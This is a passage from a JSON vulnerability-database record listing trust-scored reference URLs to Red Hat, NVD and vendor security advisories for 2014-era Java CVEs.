"https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.5, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.5, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.5, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.5, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2421" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2427" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0459.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0454.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2397.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2413.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0455.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2402.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2423" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687297" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-009/index.html" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_apr2014_advisory.asc" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "https://www.suse.com/support/update/announcement/2014/suse-su-20140639-1.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21685350" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180008" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678048" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398943" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681114" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#oracle_april_15_2014_cpu" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59550" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59555" }, { "trust": 0.3, "url": "\\https://www-304.ibm.com/support/docview.wss?uid=swg21677490" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677490" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673611" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180257" }, { "trust": 0.3, "url": "asa-2014-203" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-14-105/" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677072" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675973" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672047" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020184" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679187" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673576" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678883" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21664899" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675205" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6629" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2401" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0449" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0432.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6954" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0432" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2409" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0448" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0448.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2422.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852974709252\u0026amp;w=2" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33881" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0457" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2187-1/" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0413.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0412.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0864" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1717" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1716" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5804" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5087" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0865" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4471" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5075" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3557" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4002" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5084" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1478" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5820" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0441" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5823" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0870" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3554" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0862" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1713" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0706" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0434" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5784" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5830" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5800" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5086" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3556" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0425" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2383" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2447" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5778" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5780" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5069" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-5035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3571" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0426" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5850" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3552" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-1876" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2384" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3521" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5085" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2407" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5071" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1475" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5774" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5782" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1725" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5790" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5805" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5802" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5825" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1484" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2430" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0872" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1718" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5772" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5074" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5072" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2436" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0822" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1537" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3553" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0025" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0169" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5077" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3544" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1571" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5081" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5840" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6629" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5783" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3560" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1480" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0869" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2417" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2471" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5076" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5842" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3553" }, { "trust": 0.1, "url": 